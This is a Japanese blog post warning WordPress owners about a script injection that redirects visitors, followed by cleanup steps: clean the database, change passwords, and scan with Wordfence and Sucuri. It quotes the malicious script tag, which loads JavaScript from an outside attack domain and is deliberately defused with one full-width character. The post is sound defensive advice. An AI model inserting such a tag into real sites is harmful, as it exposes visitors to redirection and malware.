【ご注意】WordPressの不正コード改ざん
2022/03/25
WordPressを狙った不正コードによる下記動画のような改ざんが横行しているようです。
下記内容のスクリプトが埋め込まれており、アクセスした人が別ページに飛ばされるといった類のもののようです。
<script type=’text/javascript’ src=’https://sdb.dancewithme.biz/db.js’></script>
※sは故意に全角に変えております
改ざんされた場合は下記の手順で修正してください。
データベース周り
まず、データベースのバックアップをし、データベースの中に入っている不正コードを削除します。
削除したデータをデータベースに戻し、データベースのパスワードも変更しておきましょう。
WordPressでのチェック
まずログインユーザーのパスワードを変更します。
その後、Wordfence Securityプラグインをインストールします。
チェック後異常箇所を変更します。
Sucuri Securityも使ってスクリプトのスキャンをかけておいたほうが良いでしょう。
皆様、ご注意ください。
関連記事
-
-
Limit Login Attempts Reloadedとしてヤツが帰ってきた件
かんたん優秀なセキュリティ、「Limit Login Attempts」 Lim …
-
-
タクソノミー(ターム)の記事一覧を出したい!
あれ?archive.phpで表示してる・・・? WordPressでカスタムタ …
-
-
Gist、いいね!
コード見せたいンゴ・・・ WordPressのことでよくコードをお見せする機会が …
-
-
ショートコードの出力結果が固定ページや投稿の上部に表示される
またもやWordPress覚書。もはやメモ帳代わり。 固定ページなどの途中でPH …
-
-
WordPressで自動ログアウトを
本当に自分のための覚え書きになっている当ブログです。こんにちは。 自動ログアウト …
-
-
NextGEN Gallery2.2 日本語化
ここに日本語化ファイルがあるのでダウンロードします。 NextGEN Galle …
-
-
WordPressで記事のカルーセルスライダー(jQuery的なスライドショー)
WordPressがそれなりにいじれると分かってから、嫁様の私への”こき使いっぷ …
-
-
サムネイルをいちいち入れるのめんどくさい人に Default Thumbnail Plus
めんどくさがりやーな「だいすけ」です。 こんにちは。 WordPressのサムネ …
-
-
マルチサイトで複数のブログの新着情報を取得したい
WordPressでマルチサイトの新着情報を取りたいなーと思うことがあったのでメ …
-
-
category.php内で現在のカテゴリを取得する
カテゴリの取得でハマったので忘備録しておきます。 いつもはget_the_cat …